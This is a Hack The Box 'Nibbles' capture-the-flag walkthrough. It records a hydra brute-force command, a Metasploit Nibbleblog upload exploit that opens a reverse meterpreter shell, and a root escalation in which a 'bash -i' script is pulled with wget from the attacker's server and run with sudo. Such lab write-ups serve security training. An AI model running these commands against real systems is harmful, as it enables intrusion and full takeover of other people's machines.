HTB Nibbles

$nmap -A -sV -T4 -p- 10.10.10.75

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 10:38 CEST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (6).
Stats: 0:02:58 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 79.31% done; ETC: 10:42 (0:00:46 remaining)
Stats: 0:04:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 92.09% done; ETC: 10:43 (0:00:24 remaining)
Nmap scan report for 10.10.10.75
Host is up (0.044s latency).
Not shown: 65407 closed ports, 126 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 348.08 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Access to http://10.10.10.75/

Do we have a /nibbleblog directory?

Access to http://10.10.10.75/nibbleblog/

$nikto -h http://10.10.10.75/nibbleblog/

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.75
+ Target Hostname:    10.10.10.75
+ Target Port:        80
+ Start Time:         2020-07-15 10:58:50 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...
+ OSVDB-3092: /nibbleblog/README: README file found.
+ OSVDB-3092: /nibbleblog/install.php: install.php file found.
+ OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.
+ 7866 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-07-15 11:06:24 (GMT2) (454 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Results:

  • OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
  • OSVDB-3092: /nibbleblog/admin/: This might be interesting…
  • OSVDB-3092: /nibbleblog/admin.php: This might be interesting…
  • OSVDB-3092: /nibbleblog/README: README file found.
  • OSVDB-3092: /nibbleblog/install.php: install.php file found.
  • OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.

As can be guessed by the box name and the results we are in a Nibbleblog.

Let’s going to obtain the password of the admin user.

Referer: http://10.10.10.75/nibbleblog/admin.php
Request body: username=admin&password=admin

hydra -l admin -P /home/ruben/ctf-tools/rockyou.txt 10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^&Login=Login:Incorrect username or password.”

Access to http://10.10.10.75/nibbleblog/admin.php using admin-nicole.

There is a blacklist control implemented.

Using default credentials (admin/nibbles) we can access.

Blog version:

$searchsploit nibble -v

[i] Unable to detect version in terms: nibble
[i] Enabling 'searchsploit --strict'
----------------------------------------------------------------- ---------------------------------
Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                           | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)            | php/remote/38489.rb
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

We have a Metasploit exploit, then let’s run it.

msf5 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

msf5 >

msf5 > use 0

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

msf5 exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3

msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.14

PASSWORD => nibbles
rhost => 10.10.10.75
username => admin
lhost => 10.10.14.14

msf5 exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nibbles          yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.75      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.14      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3

msf5 exploit(multi/http/nibbleblog_file_upload) >

msf5 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[-] Exploit aborted due to failure: no-access: Unable to login. Verify USERNAME/PASSWORD or TARGETURI.
[*] Exploit completed, but no session was created.

We do also need to add the targeturi.

msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.75:45282) at 2020-07-16 16:49:39 +0200
[+] Deleted image.php

meterpreter >

meterpreter > getuid

Server username: nibbler (1001)

meterpreter > dir

Listing: /var/www/html/nibbleblog/content/private/plugins/my_image
==================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  258   fil   2020-07-16 16:49:39 +0200  db.xml

meterpreter > cd /home
meterpreter > dir

Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2017-12-29 11:54:16 +0100  nibbler

meterpreter > cd nibbler
meterpreter > ls

Listing: /home/nibbler
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2017-12-29 11:29:56 +0100  .bash_history
40775/rwxrwxr-x   4096  dir   2017-12-11 04:04:04 +0100  .nano
100400/r--------  1855  fil   2017-12-11 04:07:21 +0100  personal.zip
100400/r--------  33    fil   2017-12-11 04:35:21 +0100  user.txt

meterpreter > cat user.txt

b02fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Get a fully interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash”)'

nibbler@Nibbles:/home/nibbler$

If no command is specified, sudo -l list the allowed (and forbidden) commands for the invoking user.

nibbler@Nibbles:/home/nibbler$ sudo -l

sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Monitor.sh?

Let’s create our own monitor.sh that spawns a bash shell.

$cat monitor.sh

bash -i

$python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.75 - - [16/Jul/2020 17:19:22] "GET /monitor.sh HTTP/1.1" 200 -

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget 10.10.14.14:8080/monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget 10.10.14.14:8080/monitor.sh                         
--2020-07-16 11:19:22--  http://10.10.14.14:8080/monitor.sh
Connecting to 10.10.14.14:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8 [text/x-sh]
Saving to: 'monitor.sh'

monitor.sh          100%[===================>]       8  --.-KB/s    in 0s      

2020-07-16 11:19:22 (1.36 MB/s) - 'monitor.sh' saved [8/8]

nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la

total 12
drwxr-xr-x 2 nibbler nibbler 4096 Jul 16 11:19 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rw-r--r-- 1 nibbler nibbler    8 Jul 16 11:17 monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh

sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection
root@Nibbles:/home/nibbler/personal/stuff#

root@Nibbles:/home/nibbler/personal/stuff# cd /root/
root@Nibbles:~# cat root.txt

b6d7XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *